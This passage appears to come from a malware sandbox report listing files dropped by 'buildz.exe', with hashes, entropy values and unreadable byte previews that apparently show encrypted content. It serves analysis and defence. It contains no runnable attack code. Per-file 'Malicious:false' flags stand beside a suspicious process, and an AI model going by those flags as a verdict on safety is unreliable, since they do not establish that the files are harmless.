                        Preview:windo.$...L*a...+.....#.z.N9.k&b..,...p..k...a..[.\..P.....u..J.^WZl...E..._..b.l....Wi<k._..@..i....[..,..+....Y.1...n*`\I...aV..e..[..Q..}...W..F...Q..x..?"u..;p..|.N.e..^.3I.ou...,5.f].Z;.!U.n....jv+r....01....f.".c.....W].=..k..]=UA..X..{.....u<..~....Q7*..?.,.....A.]*...G.=.fOG..~.KU...%7..(....].VC1.%..l.d-_.iE.X.5H.*$u....&z^....da..WX....u....@r..........JD.....q,.%i?+v..j...Y... .U..... ...DN;.i..A...i'......04.D9..\.6........EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):11876
                        Entropy (8bit):7.984458597196567
                        Encrypted:false
                        SSDEEP:192:/XcLuJHupTtjrpYaJi+alEe9yOPMzGZPbCmES8oT+IJWT3m6y7C6V+TI8pA/3A:/GukBtX2adT7nAFtJWLm6yfVI23A
                        MD5:90713CAFF4FEB333E543FCB4A88C0A2B
                        SHA1:15BA4AB73DF35320149704BC3AFA501551DE35DD
                        SHA-256:2561115B71724407DC145B86728797675023DC7704ED91711D8C64E558EDF448
                        SHA-512:D46807B59D34DA803C586E6ABE6EA7501EDF3B0F85CF84A88F0932EA97110870F97DEC27A4DEE9701BAC54FC7BB43B667D6BB67EEA585130D43F7B271D0F58DD
                        Malicious:false
                        Preview:!func.n..P...b06.I....S.3|...O.a....^U.c.....-....OuR...`[...!*..>.pi......2VP.S..... ....!.d.,..=~D.AK..$P..a......P)..._i...u.s.N..~g."..m2....{.N.z;...h.n`../F#n...........,Q....D,...v.)lF...D.;.$....)...v.....A..zvb2.....k.....c.V.A.J....1..p.....:0{.(.1.|N...^I[...^ (v.......5r..J.N.|..d#!b...+{....CZB.[d.4.`.Y.#.G..? ....5.H...........o....VT.>..6.w.9|....J..[=.(.2..f\.\.T..R_.Y.*g}<}...3...#..;..h..t#<L..pD...p..b.".&6_.0cu..A.Q...^.g.....l..n..q.ye.._..........u.?..r.n.*'.B".q..c..[...T...o~.H".........L5..s.n..9Hx.....i.VR."9T..../L!.y.8.q...K...f..[..Q.%...~<^T............e...;g.Q$Q.g*.#/...)....3`;.....|..T..Z..(DT..j.}....~...F.a..#yj5....-.._......R.1q.D..m.....uO..~-.u...7C.^...w..B.F..AGg..L..[.........ey..KH...8.1.ZEp.......e.2.YD.._9..S..D.0....4...J..T..D..`|........D...._.rC...#K.......On.....Rx.1.(..t.....2a...%..S..e..qb55.OH+.M.....e.H.~I.eb...~.O06v...ZHJ...O(......|.,.D.Z... .ND-)..xt....08..S...{...S.z .
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):455
                        Entropy (8bit):7.401898987160828
                        Encrypted:false
                        SSDEEP:12:gd7xjQJfEvGbF0nSOdQtJ/lRaw4t26Gcii9a:Y7GiG0dmtJ/lRaHGbD
                        MD5:6173703C4F6A22A01C51E5BD1EB010AC
                        SHA1:EC9494EC175023D3E45EEFD9511AE4F7FA5D4096
                        SHA-256:392E97CA152B2346238CADF9FA1F610FF73DD14D4BD0026A2BF3757458BD6FD7
                        SHA-512:2837D90DB8FF73A2EE6B72C7EDDA05765541C3C595CB1A8F298D1E93A2ADDDCDB23F3E9A34E05CC5E8AF323F7399F08F76FA797D1FAFF14F26DA705F824E1AB8
                        Malicious:false
                        Preview:(self.N.L...zx...... ...\C.'.M.X.k.Lt..9.F..o....-..r.@..?J....q_...x...C-.4Z.0gC...$,Ed..+.$...K{>.#}r.D....a...(.Q$.."Vrt..(.,.j.(]..s.........ks.a)..3..r+.q..wj.<...b'..xK..`...b2.u..l...C+...T.....2.y..L.6`6.....Q*O.a..l.!&...xu$T^..D.]e?...0.5.zR=>..>o.dD0{^..!.7W..O&..<4....Z.c.U..p.+...!..z.@...Iw..9...../3b..8..Q.L%...(....up..../4....szZ..b.a..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):14677
                        Entropy (8bit):7.987593245819328
                        Encrypted:false
                        SSDEEP:384:UcIIFteW0MG52tGscSZ4+tXspOioG7qPWC5g2NzxsqXqYA:kYeW0352J/f1spKG7qPs27sLYA
                        MD5:351CC7D82D955B81C758B3484FAAD509
                        SHA1:39877FB189912AEE6FA27E25E1E0C7E440B66B80
                        SHA-256:0AB6650F6B4839095B7D0C4C911FDA1B9A66E9B726DD1FA0ED155A6299ECD936
                        SHA-512:CB0A7831EA11AF0B3D42A9951C8CBF839339AE0BFC560C3B62937DF91E79A5A0BCD400762348E51007408767C9F51873DFBF57E5D9A160D9FF310D781D71616C
                        Malicious:false
                        Preview:eyJibf...]..Rt.Y.J|......W.ZG.a.k.h.~..LT..0...._U.w.a.G%m..S.e...V.._.."...B.)if'M..R.U..z..~//.2.. 2...#.&.A.k...^..8r..ay..._1..T...W{.`!.L./.g<uM.-.Do....._..K....+TCo....o......U........"\.....B...Y.M,..P....!....mIaj..Y..E.....s5S...&b..,a+.u..U..\.'.....p..!.g..Z.n.....>....v.s.,.......D..... BSM.=i...C..#`.O"a....x.4....%.......f.@...7.t..SQ.....I.5'Q..)5..4.e..&..\7...!;..L..l....o.....Mb.V.a....n...3Bm\v...a.D...R,9B..w....{t..^.U..6@..630.#...6D>`d.tp...6......3.....6..2.........@..5z....".9.i..R..n.0.E.)/{...."+g....\;...Rx.....W|9I{...,i..:.!H.p^`}...z.3G.J...I.o.R...7.-.w...L..ic{.Bb....b.^.!.onY.oVQ..X.b:..C!C.kn}.L..E....oU..]=B.~........+r..H.gY..W.......G.....#.j.9^BE(...b.AD.[..m. ..$O<W%...c.b.f.f....x.u.]a..l..e.\.[.~c..{&.....j.Yp..+...<N.x..<\s,Z.(........8.6..|........32.-Ez.l.,..[...E.......+..#.(4.G..#.......M.....i..]..|.D.|.I?.....].;...Q.v..+0..3..........zP.F.1..f.b........P..!.m..?.u.~.3.-[.....6cn$..v..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1946360
                        Entropy (8bit):6.064329806412557
                        Encrypted:false
                        SSDEEP:49152:GykuMrT9ZVAgJVVgdsvtbJcbKPPNb4hbmPJHM0PBudMW:G7TrTf7NtNb4hQW
                        MD5:57E5AE979A6CBA8EC7D2CE6505686021
                        SHA1:E295FD5D1BB86C44E168E0896774BDFBF145F54D
                        SHA-256:EDD4FC30A3E91DE5BF6CB7DE5E324CA928D18D74CF8B3CB78F2DB2F77759DCBB
                        SHA-512:7C628BB72B5E337EE749C30FF0FA171FF7F89F7054F30DAD55ADF054FB6B3B3713C27AACD14A4E3B31FC8D02269538F365DDFB53594826AFB5A2C9D7D277438A
                        Malicious:false
                        Preview:!func...aG!8.....'.j..n&..Y..e.}.=.e.j..w...*...].!..c...6^..5.Q.0..S..DZN.+W....J..t....X..#...[>.....u.[8TH.N..h... hh.}e.5#...[.@...t!..R..v?..Ql.......P...H....tY...e.D.W..].I.IS}b..A.}1).....%...#j.Q.$....-.+.}.. ....sL...>5;...2..P....%.1...._..&k.zx...-S|]............YmX.Rm.....t.~..&h.+=..ui..M..u:..wn;..z.iO....6..Y.....lL.S...~K....... ..b'....1..........<Y".+4..dWob...@$Q.fH$.V.....iDM+.5.r]...I..w.[[..)...-.l.J.N. .C....So.<Vu....M.Jh..k_p^..v..5R.......y.r.r.....6.......&..g..g.,...!...?.e.".kbB.y.L.......9..5...U'c..o.7.7?.Q.U>.XW.b.+.a.....6.U...].O..,n.h.V.'.pp0Rb].72u7'...._....P.h|..9.R+X.=.E.........r=bN....h....p..'v..S........P.>.NxL...E.9cX.K.U..(".{/.p.R...w...@.....E.....0.(.1h.(_,..].z>..$9b...Cj2..e..W..=&7.#.\.a_J...s.N..4...%..0.......E..u.Hk.k..(..BL....6....1.z....9..h....*.0.[%'.\`.t!..~'..$......"..6...A..9......|...1..Wg]....'.3...>.....&..>7..v......r._....LH ..Ai...n,o.@.yAf.*...{.ST..u.].....(.4...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1309
                        Entropy (8bit):7.8206853322371765
                        Encrypted:false
                        SSDEEP:24:cN5vup40Ge2Zou9z3+b5oLBILJ28hTPQGbD:8WpCe2nzOAIkg8UD
                        MD5:E98E5192E13AECED96C9A5457A9856C0
                        SHA1:52D8995B7FDC15AE5BCE0AC23559E2E8DA5F144D
                        SHA-256:DDF5A73BCDCB35583E4EA338252789B049319BB16E8675BF232AEC76EF7D1446
                        SHA-512:597E8F9E2F3CE095BA6E15E54C089022F218245552B18CBA88B9682AD40A579E11E5924D266A686CC3595B1F2DF230441977A07ADE97D6B3CFDA6C5644096D96
                        Malicious:false
                        Preview:eyJhc...{.0+..l...D........)..|Nl%.R...F.q..w;}$.a.......}jWMe...j..7..N..0~. x#.q... ...?.....uf_...bu.0..P....q.4le..(.+.+d....,..h_j.......W.1B.Z....N..Ft]........z.q-(.`..\.._..O.....b.)..l. .!.|..].?.O..9..2^93^.X..N...'Q..I...B/.u...n3~.b.yL...?....B.r.......\l5..l..m".~.~[XL......e*.M....W.7..4`.w9..qE\......z..........8.s.....?....u.....{P.E....y{:]....B...\.R........'..yYB.7.#(..l~tL.K~.c.......q7.tj.:.`/.3.e..f6......N......H"4x+Y..d.........(.R...us....(....-9....O.2.l.`jf..HJQFG.i..(.s.(O...*..I.b4...,.j...... )../}Z....(..H......#.V....4..{.z.]#...>!........].155...FA.....o..(r .?.va ...........w(....gl..T...[..|.....<.=5. {?..i...;~.....0y...p..Rr..~.....X.....Rp..."{\.R(..1..MgT...bT...d.b.]............$....."f[....<2.hY.....Z.Vg~.E.|\.tA..?lQ.s.........A7.e.f..7....w..........Y..~.....1......$..r#....Y?j}.({X./.K.M..b...........O...{.._....n.......%^sg..~..*....l..:..l....h.^k.\.p...q....!'2...U..v...-."\
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):18629
                        Entropy (8bit):7.988799225053385
                        Encrypted:false
                        SSDEEP:384:CdnsU0s1H1m6sV2XO45nPq4D3W0wUv2H8ErqNw8KENn2A:+sU39Nw2Xp5Pq4jWYv214xl2A
                        MD5:395DEC4FCD4790D5017AEF913E228AFC
                        SHA1:4B9B027834AF2241FCA8C22A2D631249F1F7A82F
                        SHA-256:EA2496FB4F36A9FA95C34EE24967047412CA1D19E885C533BD28B967384EA954
                        SHA-512:077FDB56B64D698F1266C75F812B14AE1EE45A0D8B723EBE8FED54BE2D744BECBEE2AD9027CEFCFE385437F9E235530589918EA1CF83D4BCCFDC7C82D24445DD
                        Malicious:false
                        Preview:{. "6..g%.sO..1]....Tx.U.k..{........."..."p..j.Q.+..4|.MC9.....x.=..l..Tn..GVlPS..W....~.<.%..p..3.5V...).#g./...p..$...G...lVf.*."u.#Mg......=d..5....&......5..FMz..@..$Jl.......j.. M..,.h80O..Q.2.d.<*. ...RK..s.....&1c.}.+.O..(...}....$S.(...h.M.r.t..{...../C.._'^|yglE.X.z^....T..PJ.Rdrx..R.......^.>..0.`..H,...)..#.L-.i...]Z.r!.w..M..K.!R....3.h`/..k.&jn....f..+...-..AD.U...iP.. .....V.8C>....[y..:.D~.Z....%..jO.0w.v...a.C..K....~3.V'-.k_!.B.)M.t..b>.....Nq.S.x.L.D|.ww...Tikg5../7...._....l.G..5. .....|.j'w...Jq..S9Y~..;..$......K&).....H.*.h5..B1.........\.%'..(].L...0...eF..?;...7.f..OyA..z..U..ZR....G.(...2..1(...q...._....Sy/y9.../>..i.+........Jr. B....Et....>..`.0.P.B.....oj....g....Y.JTtJ......S.(Y...b....Q.\B...N..4R..i...<`S.J..q..,{l.U...|Mq>...KON]..../.......g.....|.+....R.Y|..Y.!..~...@.....B.[........f..<./............^..]X.M...........~....NP........y..-B5.4!=#.!c|....~...._o... V...{.hl7.>.Z....2`.l.N...;...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):15335
                        Entropy (8bit):7.987058528782776
                        Encrypted:false
                        SSDEEP:384:QyWEWF10ZHsdPiFJx39mSOoErGV5yAp2iA:5WEDMdPiDooo+5yABA
                        MD5:16E57D5FC19E31BA4FA838540A990CC5
                        SHA1:5089D55A03EF3B9796162C9BB580C1915D35C56F
                        SHA-256:C6CC9831B279C58F22096C21791710073965DCAADA1BCCFD965086DB8896D929
                        SHA-512:BF949ED7D85EAD31A4E32ACB97907C984B10F7FBFCA2E21A9F5EC7DEA2DFADCC2BDB66960A5AB9099C60C32D02EE8EC3511292DF0E55B76448AA87C17E782471
                        Malicious:false
                        Preview:{. "I/_.(9b#+...j.O.E..).n.'mk....c.*....c...........Hb..;M.S1h.... .@.a.7(GSt;.\-1...zNYk.(..5`Y..M`.-...?.x:.(.h.J...G#..K./-..f...p.8...R.>...i.#9.........).LKPu.:".n^%..:.L...[...a~...<.<...a..d..E....IN..C...bj%N^N.Y.:.3K.>.p.j&...._.;....y..3...Gs.[.0...wu.B...s9g7.... .']#I!....c....F...^.p$(......J6w.`m.vY..E.`......g/..3.ku^A..R...G...b..O....#..L.....5R3..O..[.....KCYm..).wB*.s..;.I....".@*........t..\.WVd.........~.P....7e.gR...bs0.....K.<WrK..VX...c....M.].K2..6../.A.=.:v!.#...SW....<;G...-...E.[.....*..[?o........zrU.....HM.}..s.a.Q.&u.2.....I...{.+..cx""..j2.^.!./9s...^.>...*...|..Q..."..]..\......a@.C5..~&..M..B..{..Bv.A....`-..^..........Io.{.....1 Q.q^.^.4...... .*..iE....e.r\9.|!J....r0Td..M...g."U......2.....Z......>NQ.{..............8.C?.`....l.N,E..iZ........_H....e8...... [..T.9U.....v.Rl..T..iI.oPv4.J.....}v.].j...;....r...wb..W.5......rs.jffxKg.x.....t..R.P....X.5 %M.KQK..)....$...3.,* ..=M1..w........R.%.t..[.=.....R,..n.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):13524
                        Entropy (8bit):7.987299642414948
                        Encrypted:false
                        SSDEEP:384:hPN2Y7DJfIUUln875x7krps5ib9pGA+mLJphIkdQWtA:1TNf3UiFdkrfZR+WJphfttA
                        MD5:40319BD072655405488DC4C52877CBB0
                        SHA1:5EEDD1A847F3FCCD9D86B6036B6FA18D88540C17
                        SHA-256:3524DF4C522E0BDA1D7B3274C682D67015F2F86179A483A644314C8DDA9FDE82
                        SHA-512:60CEEFDADE1C3E746BEBB49432D6C21777B7437CF9D31F708541AA333B00F5424773FB5A1471FB615F27FC8721062052B7C540AEA425382FA8BD14753D7EEFDB
                        Malicious:false
                        Preview:{. "...X..x.f=$...K.....yUW.|..............0d.......A..M.q.e9c.]1V.@...#DyC...ie..d..\......w...Q..w...{.h......E...|G.....V.|RR......+.....m.-h....q...c@..(...6.'..F.S@..,F}af..ME@..>;c.......Hm}i.....D.....oU0.kP.5t.qK.%...p..d....h.[.?fk.>..e...J........{........).=<...Y)j...H.&.|......E..^...4.......E?H.<.P.:...:...".@nz../.H...L...OT....}....T.....d.F...r.....>[X..&D.f........|..3.a..'V.]...M.?d?..y"...M.A...H...L.:'..,.g.B4........?.Hl..b...0.n.$=8....fF.....w?...........%..0.... 0.....R..ok.......G>..P3"..Z..Q.JX..v..[...r.d...l.x].....]......(..N-....:...R...5..q.S.t,...H4.......h.....gzjp._..%.9.V......U].f..........1\.>--...w&#t....x.G..Z3....c'X......D.@.P.&..........cLL....+...L`...z%..q..."zD...4. yL..#3...9....]."T...[.\.0.u...IYpw$..n...H.+.2..a@o..&\.^I.`......x1X./.h..Y..(....../'8..9,6.'..O5.F<..s...W1C./.2..$tf...K....T._.s..].X...J...?.......\...P1...lug.q=.c...a.lt..sk...=.5.).nt......E...[{'.mp......o...t.4.V.:..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):14923
                        Entropy (8bit):7.986567204152449
                        Encrypted:false
                        SSDEEP:384:g65g3xwjm4s66uPWRcxYbwSaTshtDUD0r1A:jmWjvsOWRcxYbFaohtDoq1A
                        MD5:F8C5558526FC178FC7E5E88EB6247126
                        SHA1:12F50786B9200C10598C49A21776A54DF9788A55
                        SHA-256:AD93A750D46A73AEB23C1822759F507E1F20B078511E64DC31D18DE2E8F65AC3
                        SHA-512:72E3C8310B63D85B32EDBB28EA6E149EE82B30C528182677516917F439BD840F7DCD59AEDE1AE6A1FDC10A234AF7CF793A94D16B436A08D7A1243827DD7EA836
                        Malicious:false
                        Preview:{. "7.m,.'......G.....?.H.v. .....:.91.)O..w.P.lV.....|..H..Q,'....l.85n.~...D<....0K......;.%.wI.d....KC.u.G..p...(&.2.).x.7J.W2..0]W.p...j........b..1..../.Yq..u..FtP..f.....yxglc@.b..q2....<.P...({.b.^.3.....aS...z5|....<s..[@......j...:...`.......Z.T ..s(.R].D.%?F.~......i*.....o.C...F.*./."/lZ.2.....yXA.2.fH.9...=W...2z...K..Y....q..h.0A..l0D.J.....Bi.q.Lw..\.<.S.........Nt..@...S.|....V...~....o..&a...B...@...6...awF...<..X..+..qMC.P...S.H(..8.(U....7..LN.G.*.....V1.4.../........"<..$.Ci.ibw.V....[.. ....A.G.$.|.j.u..q..p.U.....P...p>OBQ.Y..P..yR...C=.xI......7@..p..=...Hx.)..3r..sm.....Om.p.g...D,{.i.......s7.UB...vz.xDVst..6.w......y?,.Ujl.*DRW.......P>...c1%?f.%V..;...C.s........M.Q.4nl.\..|..A;j5^.4\j9.j3..-...:l ..T]....Q...O.O.....Z.. .g7.....zA..Ng..r..6.6q.n....T,....Un.7#..<.......S..@.....t..%..Kb..Y...+.U...e...\......}?.U...Vmt............y... ...:Q....~.:.r..P....!g..0...'...,............S...-....p.s..S.....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):15903
                        Entropy (8bit):7.987393292633214
                        Encrypted:false
                        SSDEEP:384:vh4Yj8ZoF7y5tSUVW+KZ6wX5D4vRKM+PV0QUoAsmFN5CQnA:P8Q7OslZ6SDUl+P6T3vCQnA
                        MD5:B9358018F5C3BFABA493C2FD1CE6C152
                        SHA1:00E33036147D072C9882AA8B9C567DBE09D7C194
                        SHA-256:335D30F664A41CD032961D869CA0497D010A1D95907DDE17B18D65F410C58E35
                        SHA-512:34CFAEE9B6ABFB8D7C3899C237034551836121D970CF1EAD6C9E547237859E868D7AE0723A816E6C00F5347BF90EDB54834BCFA060E9221DE5162028E4046638
                        Malicious:false
                        Preview:{. ".a..%4...2..._.l!.wD..;.*EF@...6...kN....d.....b.N.M2.~..W..`.sB...>.nv.1..h.....M.Sp..VvN5.g.N.h?9q.:.....n.......#e~$.,..}..yp.O..@[ZhrF..c.....'..7....:M.{.8.....9.....-.............Nc..n.$.A...=M..k..k..N.....b.d.N'...V.....WG..,...[_.K...vu"8.UQ....q0!.f../..._.qg..n...}.}.9.r....5HX.{d<&.L.i... ;.1...g...B../Eh..j.-.......s.^c....N.X.^P..?....$....$<A....\..vJ....S.*..2...............p.~*...h....B...pGzRr.Av.d_..I.....X(F...<.cbWC...K.....<..j.T09...9W../.f.......\..{.L.>..Z,|.....;.........b...9...VT......k"..k.T.....3...>....g....[.b..Z....M..........M..rGFi.#.Y.5..`.&M....Iv(...^..+..e4?.T:.H..^.1..._..U.X8......'.{......ja....o*.9.9..&..\M.wj.........L...._(.:..28...V..6...v.....XW..TS....l.R8...=..... .JdD...kg_n`..........sV(%I.=Fv+p..b....>.8...(._...;...U...C.......IB.?........5....N..S{|.%Y.o.....^..s...k.\~v.Wr...../.....Y..J[%x'...J.em#..y..W.N.r.1&.9[-&'..-E]?.d......aU='M.2.?0.0..............}.gO.)...-...[..n~ ..........`s\..E~
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):15895
                        Entropy (8bit):7.989022511421659
                        Encrypted:false
                        SSDEEP:384:uxzVWch9grRv/PleKLcnvXmpvrFO7n0sO5GeyQA:urWt9v/depnvXuswZNyQA
                        MD5:16BC6011232D7C958DD276B160E49FA0
                        SHA1:7E87B09A5F356ECB093DD83EE8426DFA54787350
                        SHA-256:866FB5DB43DBE814030E326B6540FC066BD4D6E5D93D839EDB1CA704EB8E3B62
                        SHA-512:E49AF8A9A46561EFC85A4BF7F40EB9FAC8FFF8542B2F28E17ED5FE7DEC9B76E4DD20DFE63183E045D2C6719C54979F663D18B35238411549C6E3E318C81F1C02
                        Malicious:false
                        Preview:{. "%{...hb.J...%.!V...,.=_.....eP%2.Cn..........;..-..e.4v..J}.8E.g....r.3VN.].....}..3=...6........HB:..u.8..N..~.....6`..X8_........._.5'c..=A.|.lp.$..R....q.-Lc.*....~...C....@.g\.>..z.g....M..B.%..u.X0.1'S..:4HG..E.~...u..Wg..7.7..#..F.<_#.......dg-.T....V....w.!..._M.f.0..5...w(..<...{.4...+.2......s.z..?ZI&..T.....S%..4./*H.3.(..q..t...^|..C.qs.W.c....2..'.P.y.i0.*"...x.77{.8.m[....=...iTK.kr.t.q.&"t71.....r..t..K.\Z2.......phxA...T..;.-..$..5...h..... Yp.......uFBS..3..Y]v.R....$........fG..`.........0.~GkC..A..%#....>..L.:[1..$.......X.`......;.u.....MD...xR.m....u....,..T$.n......H-Hpf..X|..`R..$.F(yv........p..MF ...c..L.%G.fY.P..t.OA.3MIe......;.iR.c...s....; .z..Ti.,u../0.V..6...30i..m......O..H.6vG.tP.....p.....^h6-q.<.Uh.0c j../..........r.W.E.../..n...DH.l......m.k.S.......K6^FI....>...<..].".q........#-`.......%....z...(....b...=.A..j:f3/.J....I(.....,.:..LS.qv7..l.5.^..<.~...Sw........T.B.....I}.v.i...8y....xFU.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):14493
                        Entropy (8bit):7.987384689985027
                        Encrypted:false
                        SSDEEP:384:1n+DGWnxlMS1rDhy6xfJvAzZoapOIUQM/4pQu/My4A:1n+SWxWS1rDhy6xfJv4Zoap/M3u/My4A
                        MD5:C40796C8AD66BB7D38421DAA533A37FA
                        SHA1:9FA530DF2792C00A65D97E5CD9ED85AB9ECB85FE
                        SHA-256:1629DADD96EAF7748463D352BB056FBCDC28E66A477473175921A0A048122C97
                        SHA-512:A7335ADEF4C28E4448BBA55C2DC547A39A8D5884588250049737E59D847D9DC90D2B14A3060F3F29D5F48CCB2FAD5ACCB0869C0091B0E4C59780CDCEA131A875
                        Malicious:false
                        Preview:{. ".j....I+.X..+Y..<]4.....{o...'..~p......W.d....S.2.{q^.e.7....V.....lb.a^.'.(:|...-.s.....|.b6...U.4HC.c..........D....i..<8..x..c..k.&.%..."kI...RLy.N|f_...-.:.iYc.kY.ie.G....L..`...~.8.f.o...N"9..*....[W.....%...?..vk...c..p'O.._.?...J/..w..\9.x.j.c.4Gx......k.,..0.m....$s.q...YR.I.S.ZY........L.1.*..@..;.j.\...U.<Tfr...3.h....A....~.............xn.?A...0^n.;*....Yw.L....._.j..B...._..{.Mh^."*....8.w^.=Ap....b.......t.[o...t{.z.Z....i]..Bn............p...-..j......l..........rH..{O....7.2v..g.1...dv^....U.j..T.J...Y......U6....F..dN....8P...:.f.....`L.X....R....,#...F`...@B.C...4$.z|'_S.&.0.Tu...(.T.R5.>....H.. A........BC..pk.3..y.....y...:UH.U....x..;.jX........R..C.i.,&...q.-....V.N.<.?.s.Y..uSW.s.`.b..3...+v"......+..e./..V.DU....U....^<....d......h...sE.Jk%...(..........Geop..#E.z.xhO.....U.$....|<.<"|..:!..'HQT......}.....p0..z.iOF....L.p_.s8E.I.m.K...Y..?.X4y8.<..zbY...U....:..0(5W"A..P.Y..Z..k.."..-.wX.v......D
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):14927
                        Entropy (8bit):7.988268142228857
                        Encrypted:false
                        SSDEEP:384:zSdohrOC3Dn2aXqbx8P+87LAiQ+KCP4NGNLmkFQtnVA:zSdIOmDn2aX7P+KQNoudVA
                        MD5:6C8548AB8557BBAF042C379B881396BD
                        SHA1:A7FBFCB2DBE39216F484A369517D2A7B8289E186
                        SHA-256:CE87E72CA810AAFC065B68A2F7D6BDB60B2FCCB6B4C6F6FE18EDD346317B0CBA
                        SHA-512:8D50A03BB6DC0654E5602A51EFD6BF18B2A0AF686A9EA7E2BB3F813D2466E5CC7DCC8E9DDA9DA73FB6D74DF9095C9CBA90740921EA21565B3FB16B4DEBA77139
                        Malicious:false
                        Preview:{. "J z.E.......{...-.O,X.XS....$..p.jn.=kw...~.s+...W.W..H...........!.di..K.e...1=.<.Tu.J.O...9..N].PX..s[B...k.....E.._b..q..z...j]I....8.-xr .q.F...4..Wj.KTw..<p),*|.;O......G]...W.T.[.}..P.G.)-....7..!..{.vS$D]t.s..... ;....#............."..\@.f...\:......S..."..2_.......D..F..=>.>:.\eH ...D%k......C.vC.....}70...eB...M........G.%.(1....1SWc.N.B;.....N..."]g?.b..d_..T....E.~......zx..F...zms<'.c..'..T.#.F.D...Bq'..G..;.(`.DD4"xN...0..{..../@.v-vw.z..fv!2....N.....R.)...b.u\..C.J...,....t...|.u].d.../.-...b.X5..."^...2..6..t.J..i.....0g.7.1....#8.rp.ya...#R..R..0.ff.Mi..,#o.JT............N...N...I.,....e....DE.|j...z#..,......@....~..$....'R_2>XO.....Z.)...@;..W..@...........A].d.,....8u._%u.b..E)....|~l....1....i/......FH!..cby.......B.b..DG.'....r.dg..(0..R.........I9...u..g.qB.T..f...h.h...W.5D...w..m%...]RZ......j.i[x.*...>.W w.c_.K...`f2..5P......ss...._3.U..w._o..S1..h`/j...YR.....mKI.1. .'TJE..Zp..#..XJ......5a...>.\
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):17211
                        Entropy (8bit):7.989981037429542
                        Encrypted:false
                        SSDEEP:384:8GjB1WGHuY/uj5ShjopeaaK6oEOhbT9z3m/yPQIgAJOMHTMRstEf5A:8Gj3WGgS1o5aDOlh2/yPQIgAJNi5A
                        MD5:655B3DE784ED51FDB967470A7D2C4589
                        SHA1:F1D739ACAF43CA0126365B3295E4ECF6B16B32C0
                        SHA-256:A875A657AA62E22B1EFDC7533878C50CD18B3410BF80167DBC78895C85416AF0
                        SHA-512:DA2C49B35D702037628503E3D6F3BF091F6B524A2B6BBC3662D55CC1025E924B81645716BD1FB779BE63B1395FC4EDFAD0D137B0C071BDE2A4744CDFF3E098F3
                        Malicious:false
                        Preview:{. ".g......:4.S.q.."....,.<.\....?.....c.d.Q#.....q~bB.5.b.i........Y.G#..O...\.....]K.3.c]gz...^.`....~7.......H...7.....F......m.!qW.....,zG.S.....ck^....3..c.u."....}..~.;l.9@.E.........=w........Y#......,........0.L........fy..4"..c.Uv7..|.b;...6.WS..._#m..!....ckA...L.$...A.7..pWh.o.V...*>.......55..:.*._..$.p.......Z<-.7,Q#..4.f.....p.?.....4j...z....L.....q....Q....;..La. .e.......IW..'.5/.._..<.GZ!Y.9...-..*..^..A...`8.[r.;..G.vr..M...-.-.$.T5>@......5.&.G.o.....xs.(X...8..|v.k..../.A..{.._...#...`."y...Q.Z.c...r.W@.....Fn22F...U.mz.H-.I...$p.....B.+...+.>O/b......ZM..=\....Tr..t.....<.vL..uA...MU&%....Vp..aW...d.....\..&..R.?..;..cPlp.l..W.....xT.l/.E.....^..~s....P...H~..6$..:Wp%.Y.L....v.=<.J*.F....7I...&...u..!..Jb.P.Eb.3.Mq}H.......34....a....$.7{...dC~..I".<...|...]m..;~*S|;.f+!..CgB]..m..R.sI.Nz..A....u...D.0%.s6.&......-..G...J.....M....EBW{....j.;fu...Q..&...d...c.M.=..XTP..Q.eI......[..<..pm.7.=+..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):14786
                        Entropy (8bit):7.987065672721715
                        Encrypted:false
                        SSDEEP:384:o8lkPDwzqPsHsFz5dtVFY2b/I1bm3GquU7tgA:oRHf5dtVFYEiA
                        MD5:B4E9E5822A1849602093D8989B3DFDE3
                        SHA1:70B3B6068B87A8E1301E5D0D0538E7C6666F3ED7
                        SHA-256:D587C3D3AA109D76ED5ED4613F376255CC153ACA9524B5F1DD8926C420D61E79
                        SHA-512:78D386AC5C1AC32C7E588B2A47978533CEDB81EAF657488267497B599B7AB9C38441DB724B4025E3C7964C3703BDFE5F272CDC5A469F73C4395D9DB9908CF1B6
                        Malicious:false
